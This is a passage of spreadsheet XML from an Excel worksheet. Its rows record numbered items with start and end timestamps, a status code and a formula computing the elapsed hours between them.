        <v>43168.06354166667</v>
      </c>
      <c r="G2092" t="s">
        <v>510</v>
      </c>
      <c r="H2092" t="str">
        <f>TEXT(F2092-E2092,"[h]")</f>
        <v>113</v>
      </c>
    </row>
    <row r="2093" spans="1:8">
      <c r="A2093" t="s">
        <v>511</v>
      </c>
      <c r="B2093">
        <v>10688</v>
      </c>
      <c r="C2093" t="s">
        <v>512</v>
      </c>
      <c r="D2093" t="s">
        <v>7</v>
      </c>
      <c r="E2093" s="1">
        <v>43162.988749999997</v>
      </c>
      <c r="F2093" s="1">
        <v>43245.362800925926</v>
      </c>
      <c r="G2093" t="s">
        <v>72</v>
      </c>
      <c r="H2093" t="str">
        <f>TEXT(F2093-E2093,"[h]")</f>
        <v>1976</v>
      </c>
    </row>
    <row r="2094" spans="1:8" hidden="1">
      <c r="A2094" t="s">
        <v>513</v>
      </c>
      <c r="B2094">
        <v>10687</v>
      </c>
      <c r="C2094" t="s">
        <v>514</v>
      </c>
      <c r="D2094" t="s">
        <v>7</v>
      </c>
      <c r="E2094" s="1">
        <v>43162.578703703701</v>
      </c>
      <c r="F2094" s="1">
        <v>43162.596458333333</v>
      </c>
      <c r="G2094" t="s">
        <v>251</v>
      </c>
      <c r="H2094" t="str">
        <f>TEXT(F2094-E2094,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="2095" spans="1:8" hidden="1">
      <c r="A2095" t="s">
        <v>515</v>
      </c>
      <c r="B2095">
        <v>10686</v>
      </c>
      <c r="C2095" t="s">
        <v>516</v>
      </c>
      <c r="D2095" t="s">
        <v>7</v>
      </c>
      <c r="E2095" s="1">
        <v>43162.333032407405</v>
      </c>
      <c r="F2095" s="1">
        <v>43183.918645833335</v>
      </c>
      <c r="G2095" t="s">
        <v>75</v>
      </c>
      <c r="H2095" t="str">
        <f>TEXT(F2095-E2095,"[h]")</f>
        <v>518</v>
      </c>
    </row>
    <row r="2096" spans="1:8" hidden="1">
      <c r="A2096" t="s">
        <v>517</v>
      </c>
      <c r="B2096">
        <v>10684</v>
      </c>
      <c r="C2096" t="s">
        <v>518</v>
      </c>
      <c r="D2096" t="s">
        <v>7</v>
      </c>
      <c r="E2096" s="1">
        <v>43161.302800925929</v>
      </c>
      <c r="F2096" s="1">
        <v>43245.975937499999</v>
      </c>
      <c r="G2096" t="s">
        <v>258</v>
      </c>
      <c r="H2096" t="str">
        <f>TEXT(F2096-E2096,"[h]")</f>
        <v>2032</v>
      </c>
    </row>
    <row r="2097" spans="1:8" hidden="1">
      <c r="A2097" t="s">
        <v>519</v>
      </c>
      <c r="B2097">
        <v>10682</v>
      </c>
      <c r="C2097" t="s">
        <v>520</v>
      </c>
      <c r="D2097" t="s">
        <v>7</v>
      </c>
      <c r="E2097" s="1">
        <v>43161.008113425924</v>
      </c>
      <c r="F2097" s="1">
        <v>43177.748645833337</v>
      </c>
      <c r="G2097" t="s">
        <v>412</v>
      </c>
      <c r="H2097" t="str">
        <f>TEXT(F2097-E2097,"[h]")</f>
        <v>401</v>
      </c>
    </row>
    <row r="2098" spans="1:8" hidden="1">
      <c r="A2098" t="s">
        <v>521</v>
      </c>
      <c r="B2098">
        <v>10681</v>
      </c>
      <c r="C2098" t="s">
        <v>522</v>
      </c>
      <c r="D2098" t="s">
        <v>7</v>
      </c>
      <c r="E2098" s="1">
        <v>43160.998032407406</v>
      </c>
      <c r="F2098" s="1">
        <v>43581.004699074074</v>
      </c>
      <c r="G2098" t="s">
        <v>118</v>
      </c>
      <c r="H2098" t="str">
        <f>TEXT(F2098-E2098,"[h]")</f>
        <v>10080</v>
      </c>
    </row>
    <row r="2099" spans="1:8" hidden="1">
      <c r="A2099" t="s">
        <v>523</v>
      </c>
      <c r="B2099">
        <v>10679</v>
      </c>
      <c r="C2099" t="s">
        <v>524</v>
      </c>
      <c r="D2099" t="s">
        <v>7</v>
      </c>
      <c r="E2099" s="1">
        <v>43160.031747685185</v>
      </c>
      <c r="F2099" s="1">
        <v>43161.014745370368</v>
      </c>
      <c r="G2099" t="s">
        <v>66</v>
      </c>
      <c r="H2099" t="str">
        <f>TEXT(F2099-E2099,"[h]")</f>
        <v>23</v>
      </c>
    </row>
    <row r="2100" spans="1:8">
      <c r="A2100" t="s">
        <v>525</v>
      </c>
      <c r="B2100">
        <v>10678</v>
      </c>
      <c r="C2100" t="s">
        <v>526</v>
      </c>
      <c r="D2100" t="s">
        <v>7</v>
      </c>
      <c r="E2100" s="1">
        <v>43159.771284722221</v>
      </c>
      <c r="F2100" s="1">
        <v>43353.685497685183</v>
      </c>
      <c r="G2100" t="s">
        <v>527</v>
      </c>
      <c r="H2100" t="str">
        <f>TEXT(F2100-E2100,"[h]")</f>
        <v>4653</v>
      </c>
    </row>
    <row r="2101" spans="1:8">
      <c r="A2101" t="s">
        <v>528</v>
      </c>
      <c r="B2101">
        <v>10676</v>
      </c>
      <c r="C2101" t="s">
        <v>529</v>
      </c>
      <c r="D2101" t="s">
        <v>7</v>
      </c>
      <c r="E2101" s="1">
        <v>43159.560266203705</v>
      </c>
      <c r="F2101" s="1">
        <v>43163.840115740742</v>
      </c>
      <c r="G2101" t="s">
        <v>483</v>
      </c>
      <c r="H2101" t="str">
        <f>TEXT(F2101-E2101,"[h]")</f>
        <v>102</v>
      </c>
    </row>
    <row r="2102" spans="1:8">
      <c r="A2102" t="s">
        <v>530</v>
      </c>
      <c r="B2102">
        <v>10674</v>
      </c>
      <c r="C2102" t="s">
        <v>531</v>
      </c>
      <c r="D2102" t="s">
        <v>7</v>
      </c>
      <c r="E2102" s="1">
        <v>43158.762789351851</v>
      </c>
      <c r="F2102" s="1">
        <v>43161.634212962963</v>
      </c>
      <c r="G2102" t="s">
        <v>16</v>
      </c>
      <c r="H2102" t="str">
        <f>TEXT(F2102-E2102,"[h]")</f>
        <v>68</v>
      </c>
    </row>
    <row r="2103" spans="1:8" hidden="1">
      <c r="A2103" t="s">
        <v>532</v>
      </c>
      <c r="B2103">
        <v>10672</v>
      </c>
      <c r="C2103" t="s">
        <v>533</v>
      </c>
      <c r="D2103" t="s">
        <v>7</v>
      </c>
      <c r="E2103" s="1">
        <v>43158.379745370374</v>
      </c>
      <c r="F2103" s="1">
        <v>43167.804212962961</v>
      </c>
      <c r="G2103" t="s">
        <v>37</v>
      </c>
      <c r="H2103" t="str">
        <f>TEXT(F2103-E2103,"[h]")</f>
        <v>226</v>
      </c>
    </row>
    <row r="2104" spans="1:8" hidden="1">
      <c r="A2104" t="s">
        <v>534</v>
      </c>
      <c r="B2104">
        <v>10670</v>
      </c>
      <c r="C2104" t="s">
        <v>535</v>
      </c>
      <c r="D2104" t="s">
        <v>7</v>
      </c>
      <c r="E2104" s="1">
        <v>43158.234166666669</v>
      </c>
      <c r="F2104" s="1">
        <v>43196.939351851855</v>
      </c>
      <c r="G2104" t="s">
        <v>536</v>
      </c>
      <c r="H2104" t="str">
        <f>TEXT(F2104-E2104,"[h]")</f>
        <v>928</v>
      </c>
    </row>
    <row r="2105" spans="1:8" hidden="1">
      <c r="A2105" t="s">
        <v>537</v>
      </c>
      <c r="B2105">
        <v>10669</v>
      </c>
      <c r="C2105" t="s">
        <v>538</v>
      </c>
      <c r="D2105" t="s">
        <v>7</v>
      </c>
      <c r="E2105" s="1">
        <v>43158.027997685182</v>
      </c>
      <c r="F2105" s="1">
        <v>43163.982025462959</v>
      </c>
      <c r="G2105" t="s">
        <v>539</v>
      </c>
      <c r="H2105" t="str">
        <f>TEXT(F2105-E2105,"[h]")</f>
        <v>142</v>
      </c>
    </row>
    <row r="2106" spans="1:8">
      <c r="A2106" t="s">
        <v>540</v>
      </c>
      <c r="B2106">
        <v>10667</v>
      </c>
      <c r="C2106" t="s">
        <v>541</v>
      </c>
      <c r="D2106" t="s">
        <v>7</v>
      </c>
      <c r="E2106" s="1">
        <v>43157.292002314818</v>
      </c>
      <c r="F2106" s="1">
        <v>43726.300162037034</v>
      </c>
      <c r="G2106" t="s">
        <v>542</v>
      </c>
      <c r="H2106" t="str">
        <f>TEXT(F2106-E2106,"[h]")</f>
        <v>13656</v>
      </c>
    </row>
    <row r="2107" spans="1:8">
      <c r="A2107" t="s">
        <v>543</v>
      </c>
      <c r="B2107">
        <v>10666</v>
      </c>
      <c r="C2107" t="s">
        <v>544</v>
      </c>
      <c r="D2107" t="s">
        <v>7</v>
      </c>
      <c r="E2107" s="1">
        <v>43157.18613425926</v>
      </c>
      <c r="F2107" s="1">
        <v>43175.655474537038</v>
      </c>
      <c r="G2107" t="s">
        <v>31</v>
      </c>
      <c r="H2107" t="str">
        <f>TEXT(F2107-E2107,"[h]")</f>
        <v>443</v>
      </c>
    </row>
    <row r="2108" spans="1:8" hidden="1">
      <c r="A2108" t="s">
        <v>545</v>
      </c>
      <c r="B2108">
        <v>10665</v>
      </c>
      <c r="C2108" t="s">
        <v>546</v>
      </c>
      <c r="D2108" t="s">
        <v>7</v>
      </c>
      <c r="E2108" s="1">
        <v>43156.833182870374</v>
      </c>
      <c r="F2108" s="1">
        <v>43202.95511574074</v>
      </c>
      <c r="G2108" t="s">
        <v>547</v>
      </c>
      <c r="H2108" t="str">
        <f>TEXT(F2108-E2108,"[h]")</f>
        <v>1106</v>
      </c>
    </row>
    <row r="2109" spans="1:8" hidden="1">
      <c r="A2109" t="s">
        <v>548</v>
      </c>
      <c r="B2109">
        <v>10663</v>
      </c>
      <c r="C2109" t="s">
        <v>549</v>
      </c>
      <c r="D2109" t="s">
        <v>7</v>
      </c>
      <c r="E2109" s="1">
        <v>43156.802928240744</v>
      </c>
      <c r="F2109" s="1">
        <v>43167.878993055558</v>
      </c>
      <c r="G2109" t="s">
        <v>409</v>
      </c>
      <c r="H2109" t="str">
        <f>TEXT(F2109-E2109,"[h]")</f>
        <v>265</v>
      </c>
    </row>
    <row r="2110" spans="1:8" hidden="1">
      <c r="A2110" t="s">
        <v>550</v>
      </c>
      <c r="B2110">
        <v>10662</v>
      </c>
      <c r="C2110" t="s">
        <v>551</v>
      </c>
      <c r="D2110" t="s">
        <v>7</v>
      </c>
      <c r="E2110" s="1">
        <v>43156.529953703706</v>
      </c>
      <c r="F2110" s="1">
        <v>43156.980902777781</v>
      </c>
      <c r="G2110" t="s">
        <v>552</v>
      </c>
      <c r="H2110" t="str">
        <f>TEXT(F2110-E2110,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="2111" spans="1:8" hidden="1">
      <c r="A2111" t="s">
        <v>553</v>
      </c>
      <c r="B2111">
        <v>10661</v>
      </c>
      <c r="C2111" t="s">
        <v>554</v>
      </c>
      <c r="D2111" t="s">
        <v>7</v>
      </c>
      <c r="E2111" s="1">
        <v>43156.492291666669</v>
      </c>
      <c r="F2111" s="1">
        <v>43158.702604166669</v>
      </c>
      <c r="G2111" t="s">
        <v>28</v>
      </c>
      <c r="H2111" t="str">
        <f>TEXT(F2111-E2111,"[h]")</f>
        <v>53</v>
      </c>
    </row>
    <row r="2112" spans="1:8">
      <c r="A2112" t="s">
        <v>555</v>
      </c>
      <c r="B2112">
        <v>10660</v>
      </c>
      <c r="C2112" t="s">
        <v>556</v>
      </c>
      <c r="D2112" t="s">
        <v>7</v>
      </c>
      <c r="E2112" s="1">
        <v>43156.339513888888</v>
      </c>
      <c r="F2112" s="1">
        <v>43157.59134259259</v>
      </c>
      <c r="G2112" t="s">
        <v>557</v>
      </c>
      <c r="H2112" t="str">
        <f>TEXT(F2112-E2112,"[h]")</f>
        <v>30</v>
      </c>
    </row>
    <row r="2113" spans="1:8">
      <c r="A2113" t="s">
        <v>558</v>
      </c>
      <c r="B2113">
        <v>10659</v>
      </c>
      <c r="C2113" t="s">
        <v>559</v>
      </c>
      <c r="D2113" t="s">
        <v>7</v>
      </c>
      <c r="E2113" s="1">
        <v>43156.320625</v>
      </c>
      <c r="F2113" s="1">
        <v>43383.688981481479</v>
      </c>
      <c r="G2113" t="s">
        <v>560</v>
      </c>
      <c r="H2113" t="str">
        <f>TEXT(F2113-E2113,"[h]")</f>
        <v>5456</v>
      </c>
    </row>
    <row r="2114" spans="1:8">
      <c r="A2114" t="s">
        <v>561</v>
      </c>
      <c r="B2114">
        <v>10658</v>
      </c>
      <c r="C2114" t="s">
        <v>562</v>
      </c>
      <c r="D2114" t="s">
        <v>7</v>
      </c>
      <c r="E2114" s="1">
        <v>43156.319513888891</v>
      </c>
      <c r="F2114" s="1">
        <v>43157.592268518521</v>
      </c>
      <c r="G2114" t="s">
        <v>392</v>
      </c>
      <c r="H2114" t="str">
        <f>TEXT(F2114-E2114,"[h]")</f>
        <v>30</v>
      </c>
    </row>
    <row r="2115" spans="1:8" hidden="1">
      <c r="A2115" t="s">
        <v>563</v>
      </c>
      <c r="B2115">
        <v>10657</v>
      </c>
      <c r="C2115" t="s">
        <v>564</v>
      </c>
      <c r="D2115" t="s">
        <v>7</v>
      </c>
      <c r="E2115" s="1">
        <v>43155.907685185186</v>
      </c>
      <c r="F2115" s="1">
        <v>43155.943055555559</v>
      </c>
      <c r="G2115" t="s">
        <v>565</v>
      </c>
      <c r="H2115" t="str">
        <f>TEXT(F2115-E2115,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="2116" spans="1:8">
      <c r="A2116" t="s">
        <v>566</v>
      </c>
      <c r="B2116">
        <v>10655</v>
      </c>
      <c r="C2116" t="s">
        <v>567</v>
      </c>
      <c r="D2116" t="s">
        <v>7</v>
      </c>
      <c r="E2116" s="1">
        <v>43155.326527777775</v>
      </c>
      <c r="F2116" s="1">
        <v>43177.983263888891</v>
      </c>
      <c r="G2116" t="s">
        <v>72</v>
      </c>
      <c r="H2116" t="str">
        <f>TEXT(F2116-E2116,"[h]")</f>
        <v>543</v>
      </c>
    </row>
    <row r="2117" spans="1:8" hidden="1">
      <c r="A2117" t="s">
        <v>568</v>
      </c>
      <c r="B2117">
        <v>10653</v>
      </c>
      <c r="C2117" t="s">
        <v>569</v>
      </c>
      <c r="D2117" t="s">
        <v>7</v>
      </c>
      <c r="E2117" s="1">
        <v>43154.445185185185</v>
      </c>
      <c r="F2117" s="1">
        <v>43156.164918981478</v>
      </c>
      <c r="G2117" t="s">
        <v>174</v>
      </c>
      <c r="H2117" t="str">
        <f>TEXT(F2117-E2117,"[h]")</f>
        <v>41</v>
      </c>
    </row>
    <row r="2118" spans="1:8" hidden="1">
      <c r="A2118" t="s">
        <v>570</v>
      </c>
      <c r="B2118">
        <v>10652</v>
      </c>
      <c r="C2118" t="s">
        <v>571</v>
      </c>
      <c r="D2118" t="s">
        <v>7</v>
      </c>
      <c r="E2118" s="1">
        <v>43154.435902777775</v>
      </c>
      <c r="F2118" s="1">
        <v>43196.939351851855</v>
      </c>
      <c r="G2118" t="s">
        <v>255</v>
      </c>
      <c r="H2118" t="str">
        <f>TEXT(F2118-E2118,"[h]")</f>
        <v>1020</v>
      </c>
    </row>
    <row r="2119" spans="1:8">
      <c r="A2119" t="s">
        <v>572</v>
      </c>
      <c r="B2119">
        <v>10651</v>
      </c>
      <c r="C2119" t="s">
        <v>573</v>
      </c>
      <c r="D2119" t="s">
        <v>7</v>
      </c>
      <c r="E2119" s="1">
        <v>43154.434259259258</v>
      </c>
      <c r="F2119" s="1">
        <v>43156.164918981478</v>
      </c>
      <c r="G2119" t="s">
        <v>25</v>
      </c>
      <c r="H2119" t="str">
        <f>TEXT(F2119-E2119,"[h]")</f>
        <v>41</v>
      </c>
    </row>
    <row r="2120" spans="1:8">
      <c r="A2120" t="s">
        <v>451</v>
      </c>
      <c r="B2120">
        <v>10650</v>
      </c>
      <c r="C2120" t="s">
        <v>452</v>
      </c>
      <c r="D2120" t="s">
        <v>7</v>
      </c>
      <c r="E2120" s="1">
        <v>43154.333969907406</v>
      </c>
      <c r="F2120" s="1">
        <v>43155.937962962962</v>
      </c>
      <c r="G2120" t="s">
        <v>453</v>
      </c>
      <c r="H2120" t="str">
        <f>TEXT(F2120-E2120,"[h]")</f>
        <v>38</v>
      </c>
    </row>
    <row r="2121" spans="1:8">
      <c r="A2121" t="s">
        <v>574</v>
      </c>
      <c r="B2121">
        <v>10648</v>
      </c>
      <c r="C2121" t="s">
        <v>575</v>
      </c>
      <c r="D2121" t="s">
        <v>7</v>
      </c>
      <c r="E2121" s="1">
        <v>43154.084722222222</v>
      </c>
      <c r="F2121" s="1">
        <v>43155.937962962962</v>
      </c>
      <c r="G2121" t="s">
        <v>160</v>
      </c>
      <c r="H2121" t="str">
        <f>TEXT(F2121-E2121,"[h]")</f>
        <v>44</v>
      </c>
    </row>
    <row r="2122" spans="1:8">
      <c r="A2122" t="s">
        <v>576</v>
      </c>
      <c r="B2122">
        <v>10646</v>
      </c>
      <c r="C2122" t="s">
        <v>577</v>
      </c>
      <c r="D2122" t="s">
        <v>7</v>
      </c>
      <c r="E2122" s="1">
        <v>43153.983182870368</v>
      </c>
      <c r="F2122" s="1">
        <v>43172.69871527778</v>
      </c>
      <c r="G2122" t="s">
        <v>578</v>
      </c>
      <c r="H2122" t="str">
        <f>TEXT(F2122-E2122,"[h]")</f>
        <v>449</v>
      </c>
    </row>
    <row r="2123" spans="1:8" hidden="1">
      <c r="A2123" t="s">
        <v>579</v>
      </c>
      <c r="B2123">
        <v>10643</v>
      </c>
      <c r="C2123" t="s">
        <v>580</v>
      </c>
      <c r="D2123" t="s">
        <v>7</v>
      </c>
      <c r="E2123" s="1">
        <v>43152.839375000003</v>
      </c>
      <c r="F2123" s="1">
        <v>43223.113437499997</v>
      </c>
      <c r="G2123" t="s">
        <v>581</v>
      </c>
      <c r="H2123" t="str">
        <f>TEXT(F2123-E2123,"[h]")</f>
        <v>1686</v>
      </c>
    </row>
    <row r="2124" spans="1:8" hidden="1">
      <c r="A2124" t="s">
        <v>582</v>
      </c>
      <c r="B2124">
        <v>10641</v>
      </c>
      <c r="C2124" t="s">
        <v>583</v>
      </c>
      <c r="D2124" t="s">
        <v>7</v>
      </c>
      <c r="E2124" s="1">
        <v>43152.802893518521</v>
      </c>
      <c r="F2124" s="1">
        <v>43153.648842592593</v>
      </c>
      <c r="G2124" t="s">
        <v>90</v>
      </c>
      <c r="H2124" t="str">
        <f>TEXT(F2124-E2124,"[h]")</f>
        <v>20</v>
      </c>
    </row>
    <row r="2125" spans="1:8" hidden="1">
      <c r="A2125" t="s">
        <v>584</v>
      </c>
      <c r="B2125">
        <v>10635</v>
      </c>
      <c r="C2125" t="s">
        <v>585</v>
      </c>
      <c r="D2125" t="s">
        <v>7</v>
      </c>
      <c r="E2125" s="1">
        <v>43151.66778935185</v>
      </c>
      <c r="F2125" s="1">
        <v>43216.649074074077</v>
      </c>
      <c r="G2125" t="s">
        <v>37</v>
      </c>
      <c r="H2125" t="str">
        <f>TEXT(F2125-E2125,"[h]")</f>
        <v>1559</v>
      </c>
    </row>
    <row r="2126" spans="1:8" hidden="1">
      <c r="A2126" t="s">
        <v>586</v>
      </c>
      <c r="B2126">
        <v>10633</v>
      </c>
      <c r="C2126" t="s">
        <v>587</v>
      </c>
      <c r="D2126" t="s">
        <v>7</v>
      </c>
      <c r="E2126" s="1">
        <v>43151.402557870373</v>
      </c>
      <c r="F2126" s="1">
        <v>43157.02815972222</v>
      </c>
      <c r="G2126" t="s">
        <v>37</v>
      </c>
      <c r="H2126" t="str">
        <f>TEXT(F2126-E2126,"[h]")</f>
        <v>135</v>
      </c>
    </row>
    <row r="2127" spans="1:8" hidden="1">
      <c r="A2127" t="s">
        <v>588</v>
      </c>
      <c r="B2127">
        <v>10631</v>
      </c>
      <c r="C2127" t="s">
        <v>589</v>
      </c>
      <c r="D2127" t="s">
        <v>7</v>
      </c>
      <c r="E2127" s="1">
        <v>43151.144953703704</v>
      </c>
      <c r="F2127" s="1">
        <v>43151.405763888892</v>
      </c>
      <c r="G2127" t="s">
        <v>118</v>
      </c>
      <c r="H2127" t="str">
        <f>TEXT(F2127-E2127,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="2128" spans="1:8" hidden="1">
      <c r="A2128" t="s">
        <v>590</v>
      </c>
      <c r="B2128">
        <v>10630</v>
      </c>
      <c r="C2128" t="s">
        <v>591</v>
      </c>
      <c r="D2128" t="s">
        <v>7</v>
      </c>
      <c r="E2128" s="1">
        <v>43150.747847222221</v>
      </c>
      <c r="F2128" s="1">
        <v>43151.70175925926</v>
      </c>
      <c r="G2128" t="s">
        <v>592</v>
      </c>
      <c r="H2128" t="str">
        <f>TEXT(F2128-E2128,"[h]")</f>
        <v>22</v>
      </c>
    </row>
    <row r="2129" spans="1:8">
      <c r="A2129" t="s">
        <v>593</v>
      </c>
      <c r="B2129">
        <v>10629</v>
      </c>
      <c r="C2129" t="s">
        <v>594</v>
      </c>
      <c r="D2129" t="s">
        <v>7</v>
      </c>
      <c r="E2129" s="1">
        <v>43150.575787037036</v>
      </c>
      <c r="F2129" s="1">
        <v>43150.620706018519</v>
      </c>
      <c r="G2129" t="s">
        <v>98</v>
      </c>
      <c r="H2129" t="str">
        <f>TEXT(F2129-E2129,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="2130" spans="1:8" hidden="1">
      <c r="A2130" t="s">
        <v>595</v>
      </c>
      <c r="B2130">
        <v>10627</v>
      </c>
      <c r="C2130" t="s">
        <v>596</v>
      </c>
      <c r="D2130" t="s">
        <v>7</v>
      </c>
      <c r="E2130" s="1">
        <v>43150.423009259262</v>
      </c>
      <c r="F2130" s="1">
        <v>43616.298773148148</v>
      </c>
      <c r="G2130" t="s">
        <v>66</v>
      </c>
      <c r="H2130" t="str">
        <f>TEXT(F2130-E2130,"[h]")</f>
        <v>11181</v>
      </c>
    </row>
    <row r="2131" spans="1:8">
      <c r="A2131" t="s">
        <v>597</v>
      </c>
      <c r="B2131">
        <v>10625</v>
      </c>
      <c r="C2131" t="s">
        <v>598</v>
      </c>
      <c r="D2131" t="s">
        <v>7</v>
      </c>
      <c r="E2131" s="1">
        <v>43149.84957175926</v>
      </c>
      <c r="F2131" s="1">
        <v>43151.697337962964</v>
      </c>
      <c r="G2131" t="s">
        <v>599</v>
      </c>
      <c r="H2131" t="str">
        <f>TEXT(F2131-E2131,"[h]")</f>
        <v>44</v>
      </c>
    </row>
    <row r="2132" spans="1:8">
      <c r="A2132" t="s">
        <v>600</v>
      </c>
      <c r="B2132">
        <v>10624</v>
      </c>
      <c r="C2132" t="s">
        <v>601</v>
      </c>
      <c r="D2132" t="s">
        <v>7</v>
      </c>
      <c r="E2132" s="1">
        <v>43149.820162037038</v>
      </c>
      <c r="F2132" s="1">
        <v>43149.965208333335</v>
      </c>
      <c r="G2132" t="s">
        <v>98</v>
      </c>
      <c r="H2132" t="str">
        <f>TEXT(F2132-E2132,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="2133" spans="1:8">
      <c r="A2133" t="s">
        <v>602</v>
      </c>
      <c r="B2133">
        <v>10623</v>
      </c>
      <c r="C2133" t="s">
        <v>603</v>
      </c>
      <c r="D2133" t="s">
        <v>7</v>
      </c>
      <c r="E2133" s="1">
        <v>43149.679861111108</v>
      </c>
      <c r="F2133" s="1">
        <v>43149.816041666665</v>
      </c>
      <c r="G2133" t="s">
        <v>16</v>
      </c>
      <c r="H2133" t="str">
        <f>TEXT(F2133-E2133,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="2134" spans="1:8">
      <c r="A2134" t="s">
        <v>604</v>
      </c>
      <c r="B2134">
        <v>10622</v>
      </c>
      <c r="C2134" t="s">
        <v>605</v>
      </c>
      <c r="D2134" t="s">
        <v>7</v>
      </c>
      <c r="E2134" s="1">
        <v>43148.821840277778</v>
      </c>
      <c r="F2134" s="1">
        <v>43149.806747685187</v>
      </c>
      <c r="G2134" t="s">
        <v>98</v>
      </c>
      <c r="H2134" t="str">
        <f>TEXT(F2134-E2134,"[h]")</f>
        <v>23</v>
      </c>
    </row>
    <row r="2135" spans="1:8">
      <c r="A2135" t="s">
        <v>606</v>
      </c>
      <c r="B2135">
        <v>10621</v>
      </c>
      <c r="C2135" t="s">
        <v>607</v>
      </c>
      <c r="D2135" t="s">
        <v>7</v>
      </c>
      <c r="E2135" s="1">
        <v>43148.819652777776</v>
      </c>
      <c r="F2135" s="1">
        <v>43150.345185185186</v>
      </c>
      <c r="G2135" t="s">
        <v>16</v>
      </c>
      <c r="H2135" t="str">
        <f>TEXT(F2135-E2135,"[h]")</f>
        <v>36</v>
      </c>
    </row>
    <row r="2136" spans="1:8">
      <c r="A2136" t="s">
        <v>608</v>
      </c>
      <c r="B2136">
        <v>10619</v>
      </c>
      <c r="C2136" t="s">
        <v>609</v>
      </c>
      <c r="D2136" t="s">
        <v>7</v>
      </c>
      <c r="E2136" s="1">
        <v>43148.278252314813</v>
      </c>
      <c r="F2136" s="1">
        <v>43186.819988425923</v>
      </c>
      <c r="G2136" t="s">
        <v>610</v>
      </c>
      <c r="H2136" t="str">
        <f>TEXT(F2136-E2136,"[h]")</f>
        <v>925</v>
      </c>
    </row>
    <row r="2137" spans="1:8" hidden="1">
      <c r="A2137" t="s">
        <v>611</v>
      </c>
      <c r="B2137">
        <v>10618</v>
      </c>
      <c r="C2137" t="s">
        <v>612</v>
      </c>
      <c r="D2137" t="s">
        <v>7</v>
      </c>
      <c r="E2137" s="1">
        <v>43148.26803240741</v>
      </c>
      <c r="F2137" s="1">
        <v>43174.940578703703</v>
      </c>
      <c r="G2137" t="s">
        <v>174</v>
      </c>
      <c r="H2137" t="str">
        <f>TEXT(F2137-E2137,"[h]")</f>
        <v>640</v>
      </c>
    </row>
    <row r="2138" spans="1:8">
      <c r="A2138" t="s">
        <v>613</v>
      </c>
      <c r="B2138">
        <v>10612</v>
      </c>
      <c r="C2138" t="s">
        <v>614</v>
      </c>
      <c r="D2138" t="s">
        <v>7</v>
      </c>
      <c r="E2138" s="1">
        <v>43147.863993055558</v>
      </c>
      <c r="F2138" s="1">
        <v>43148.00675925926</v>
      </c>
      <c r="G2138" t="s">
        <v>615</v>
      </c>
      <c r="H2138" t="str">
        <f>TEXT(F2138-E2138,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="2139" spans="1:8">
      <c r="A2139" t="s">
        <v>616</v>
      </c>
      <c r="B2139">
        <v>10610</v>
      </c>
      <c r="C2139" t="s">
        <v>617</v>
      </c>
      <c r="D2139" t="s">
        <v>7</v>
      </c>
      <c r="E2139" s="1">
        <v>43147.8594212963</v>
      </c>
      <c r="F2139" s="1">
        <v>43148.006516203706</v>
      </c>
      <c r="G2139" t="s">
        <v>618</v>
      </c>
      <c r="H2139" t="str">
        <f>TEXT(F2139-E2139,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="2140" spans="1:8" hidden="1">
      <c r="A2140" t="s">
        <v>625</v>
      </c>
      <c r="B2140">
        <v>10606</v>
      </c>
      <c r="C2140" t="s">
        <v>626</v>
      </c>
      <c r="D2140" t="s">
        <v>7</v>
      </c>
      <c r="E2140" s="1">
        <v>43147.740706018521</v>
      </c>
      <c r="F2140" s="1">
        <v>43147.869976851849</v>
      </c>
      <c r="G2140" t="s">
        <v>627</v>
      </c>
      <c r="H2140" t="str">
        <f>TEXT(F2140-E2140,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="2141" spans="1:8" hidden="1">
      <c r="A2141" t="s">
        <v>628</v>
      </c>
      <c r="B2141">
        <v>10604</v>
      </c>
      <c r="C2141" t="s">
        <v>629</v>
      </c>
      <c r="D2141" t="s">
        <v>7</v>
      </c>
      <c r="E2141" s="1">
        <v>43147.585601851853</v>
      </c>
      <c r="F2141" s="1">
        <v>43147.727337962962</v>
      </c>
      <c r="G2141" t="s">
        <v>90</v>
      </c>
      <c r="H2141" t="str">
        <f>TEXT(F2141-E2141,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="2142" spans="1:8" hidden="1">
      <c r="A2142" t="s">
        <v>630</v>
      </c>
      <c r="B2142">
        <v>10603</v>
      </c>
      <c r="C2142" t="s">
        <v>631</v>
      </c>
      <c r="D2142" t="s">
        <v>7</v>
      </c>
      <c r="E2142" s="1">
        <v>43147.298715277779</v>
      </c>
      <c r="F2142" s="1">
        <v>43152.083692129629</v>
      </c>
      <c r="G2142" t="s">
        <v>43</v>
      </c>
      <c r="H2142" t="str">
        <f>TEXT(F2142-E2142,"[h]")</f>
        <v>114</v>
      </c>
    </row>
    <row r="2143" spans="1:8" hidden="1">
      <c r="A2143" t="s">
        <v>632</v>
      </c>
      <c r="B2143">
        <v>10602</v>
      </c>
      <c r="C2143" t="s">
        <v>633</v>
      </c>
      <c r="D2143" t="s">
        <v>7</v>
      </c>
      <c r="E2143" s="1">
        <v>43147.204918981479</v>
      </c>
      <c r="F2143" s="1">
        <v>43354.725798611114</v>
      </c>
      <c r="G2143" t="s">
        <v>28</v>
      </c>
      <c r="H2143" t="str">
        <f>TEXT(F2143-E2143,"[h]")</f>
        <v>4980</v>
      </c>
    </row>
    <row r="2144" spans="1:8" hidden="1">
      <c r="A2144" t="s">
        <v>634</v>
      </c>
      <c r="B2144">
        <v>10601</v>
      </c>
      <c r="C2144" t="s">
        <v>635</v>
      </c>
      <c r="D2144" t="s">
        <v>7</v>
      </c>
      <c r="E2144" s="1">
        <v>43147.073506944442</v>
      </c>
      <c r="F2144" s="1">
        <v>43175.317118055558</v>
      </c>
      <c r="G2144" t="s">
        <v>636</v>
      </c>
      <c r="H2144" t="str">
        <f>TEXT(F2144-E2144,"[h]")</f>
        <v>677</v>
      </c>
    </row>
    <row r="2145" spans="1:8" hidden="1">
      <c r="A2145" t="s">
        <v>637</v>
      </c>
      <c r="B2145">
        <v>10599</v>
      </c>
      <c r="C2145" t="s">
        <v>638</v>
      </c>
      <c r="D2145" t="s">
        <v>7</v>
      </c>
      <c r="E2145" s="1">
